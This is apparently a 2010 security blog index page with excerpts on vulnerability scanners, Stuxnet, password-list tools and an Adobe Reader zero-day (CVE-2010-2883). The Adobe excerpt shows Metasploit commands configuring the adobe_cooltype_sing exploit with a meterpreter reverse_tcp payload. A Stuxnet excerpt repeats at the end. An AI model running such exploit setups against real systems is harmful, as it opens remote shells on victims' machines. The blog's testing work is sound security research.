xStorm Cloud Based Vulnerability Scanner from RandomStorm

September 30, 2010September 30, 2010 ~ davehardy20 ~ 2 Comments

This is a follow up from my recent posts about the company RandomStorm and its products.

After my initial phone conversation they sent me a complementary access to their xStorm Cloud Based Vulnerability Scanner.

Well recently I had sometime to investigate, these are my findings, hope you enjoy.

First off this is only a brief look at this product, there is probably so much more to it than I can explore here with the limited trial that RandomStorm gave me.

OK, first your have to start up your browser, I choose Google Chrome, but Firefox or even Internet Explorer will suffice.

You will be met with a login screen

Continue reading “xStorm Cloud Based Vulnerability Scanner from RandomStorm” →

Do Microsoft Have Tunnel Vision?

September 24, 2010September 27, 2010 ~ davehardy20 ~ Leave a comment

A recent post on Threatpost website reporting that the Stuxnet virus was reported over a year ago in Hackin9 magazine.

Why do they not have employee’s scouring the internet forums, IRC, mailing list etc to for warn the company of impending attacks or vulnerabilities.

Come Microsoft, Adobe get your acts together, hmmm I think I’ve been here already this week.

Article taken from ThreatPost

A security flaw affecting Microsoft’s Windows operating system that was exploited by the Stuxnet worm was publicly disclosed more than a year before the worm appeared, according to a researcher at Symantec Corp.

Continue reading “Do Microsoft Have Tunnel Vision?” →

Cool New Metasploit Script

September 21, 2010October 13, 2010 ~ davehardy20 ~ Leave a comment

This script is the best reason NOT to use the AutoFill function in web browsers, even Google Chrome. Its new AutoFill function has the ability to store credit card numbers, the info is encrypted, but still not good enough for me.

This meterpreter script just proves my paranoia.

Read the post here

Edit 13/10/2010

This script is now included in Metasploit as of svn update 10663.

Microsoft, Adobe – Get Your Act Together

September 20, 2010September 20, 2010 ~ davehardy20 ~ 2 Comments

Having just read a post on one of my favorite blogs Attack Vector about the recent developments surrounding the new Adobe Reader 0day, here is the link to Matts excellent argument for all of us to sing the praises of open source or not so well known software applications that fulfill the same purpose as the over priced over vulnerable offerings from Microsoft and Adobe.

Continue reading “Microsoft, Adobe – Get Your Act Together” →

RSMangler – Free Tool from RandomStorm

September 20, 2010January 7, 2011 ~ davehardy20 ~ 1 Comment

In my previous post I mentioned a company called RandomStorm and some of the products they have, well one of those products is free and its called RSMangler, basically is word-list generator with a few extras, that can be used with tools like John The Ripper.

Its incredibly easy to use and creates really excellent word-lists in no time all.

Continue reading “RSMangler – Free Tool from RandomStorm” →

RandomStorm – Security Products & Services

September 17, 2010September 19, 2010 ~ davehardy20 ~ 1 Comment

Just had a phone conversation with a company called RandomStorm – this name rang a bell but I couldn’t remember where from.

Anyways just had a quick look see on their website www.randomstorm.com and they have some interesting stuff.

Continue reading “RandomStorm – Security Products & Services” →

Secunia PSI 2.0 Beta

September 17, 2010 ~ davehardy20 ~ Leave a comment

I’ve been testing this nifty little tool Secunia PSI 2.0 Beta over last 2 weeks and I have to say I’m mighty impressed.

It basically scans your PC/Laptop for installed software, works out the version of the software, checks with Secunia’s database and decides if it insecure, End of Life or OK.

Some applications are updated automatically, ie Adobe Reader, Flash Player etc.

A few screen shots to whet your appetite…

Continue reading “Secunia PSI 2.0 Beta” →

CitiBank Continued…….

September 17, 2010 ~ davehardy20 ~ Leave a comment

Recently I was asked to setup a new user to access the CitiBank online website, and as previously blogged, they insist that users use an outdated, vulnerable version of JRE .

Continue reading “CitiBank Continued…….” →

New Adobe 0day – CVE-2010-2883

September 15, 2010September 23, 2010 ~ davehardy20 ~ 1 Comment

Having read that some folks have had mixed results with the Metasploit exploit, I decided I would try and find some reason why.

I started out by running up Metasploit and setting up the exploit

msf > use exploit/windows/browser/adobe_cooltype_sing
msf exploit(adobe_cooltype_sing) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(adobe_cooltype_sing) > set LHOST 192.168.0.79
LHOST => 192.168.0.79
msf exploit(adobe_cooltype_sing) > set SRVHOST 192.168.0.79
SRVHOST => 192.168.0.79
msf exploit(adobe_cooltype_sing) > show options

Module options:

Continue reading “New Adobe 0day – CVE-2010-2883” →

A security flaw affecting Microsoft’s Windows operating system that was exploited by the Stuxnet worm was publicly disclosed more than a year before the worm appeared, according to a researcher at Symantec Corp. Continue reading “Do Microsoft Have Tunnel Vision?” →

A security flaw affecting Microsoft’s Windows operating system that was exploited by the Stuxnet worm was publicly disclosed more than a year before the worm appeared, according to a researcher at Symantec Corp.

Continue reading “Do Microsoft Have Tunnel Vision?” →